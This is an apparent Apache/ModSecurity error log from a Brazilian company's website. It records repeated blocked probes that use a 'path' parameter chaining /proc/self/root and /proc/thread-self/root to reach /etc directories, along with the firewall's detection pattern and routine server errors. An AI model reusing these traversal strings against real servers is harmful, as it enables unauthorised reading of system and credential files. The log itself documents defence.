https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:49:34.558504 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:51744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-7uoXxyEfFpUF8f8OHwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:49:38.130636 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41278] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:50:04.263921 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41750] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:50:09.839814 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:49670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_EeyqAr6etmhZHNpgeAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:50:15.188917 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 57.141.18.84:44586] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:50:34.123405 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42438] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:50:58.962721 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.244.43:53162] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv_QQbLMZ6AikZjR9VdOAAAAA4"]
[Thu Mar 19 10:51:01.125804 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:51:22.353624 2026] [mime_magic:error] [pid 30077:tid 140411699963648] (70014)End of file found: [client 57.141.18.26:45974] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:51:25.131330 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43778] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:51:48.145790 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:52:12.037937 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44990] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:52:26.801556 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.243.128:33190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_mgbLMZ6AikZjR9VdaAAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:52:34.244507 2026] [mime_magic:error] [pid 27403:tid 140411574073088] (70014)End of file found: [client 57.141.18.34:47700] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:52:37.149787 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:52:48.210923 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:34492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_sBkFeYa1D6dYQnDwOAAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:52:52.647276 2026] [mime_magic:error] [pid 14269:tid 140411599251200] (70014)End of file found: [client 57.141.18.113:48052] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:52:52.766716 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:53468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_tNa6ubjKNq_cu4ZS-QAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:52:55.610512 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:53484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_t8df6f5d65gmYZR2-AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:52:57.891807 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 57.141.18.89:48230] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:52:59.121787 2026] [proxy_fcgi:error] [pid 19093:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46170] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:53:08.911425 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.243.128:38094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_xP-YZRR_7pZ7nDKMBwAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:53:22.121874 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46758] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:53:38.321987 2026] [core:alert] [pid 30077:tid 140411540502272] [client 57.141.18.117:48714] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:53:43.899509 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:53306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_58df6f5d65gmYZR3HAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:53:46.129894 2026] [proxy_fcgi:error] [pid 19093:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:53:47.026919 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:40082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv_6wkwaGbbGflqUZDBAAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:54:05.241247 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:49962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv__QbLMZ6AikZjR9VdqgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:54:10.129917 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:54:12.976765 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.228.61:36386] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwABP-YZRR_7pZ7nDKMJwAAA9E"]
[Thu Mar 19 10:54:32.409567 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:58246] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run
[Thu Mar 19 10:54:33.084413 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48512] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:54:38.772399 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:42156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAHv-YZRR_7pZ7nDKMPAAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:54:56.129825 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49088] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:55:08.248097 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:37776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAOta6ubjKNq_cu4ZTagAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:10.818887 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:37776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAPta6ubjKNq_cu4ZTcAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:13.671523 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:51336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAQQbLMZ6AikZjR9VdxwAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:20.029855 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:55:20.819865 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:51340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwASOyqAr6etmhZHNpg9AAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:23.104521 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] [client 198.57.247.131:17720] AH01071: Got error 'Primary script unknown'
[Thu Mar 19 10:55:26.374163 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.115:51830] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:55:37.391582 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:50480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAWfu8EFLIOrSqIpumUAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:55:39.203934 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:40144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAW9a6ubjKNq_cu4ZTegAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:55:40.352123 2026] [mime_magic:error] [pid 17887:tid 140411574073088] (70014)End of file found: [client 57.141.18.32:52156] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:55:42.779601 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:39934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwAXuoXxyEfFpUF8f8OqQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
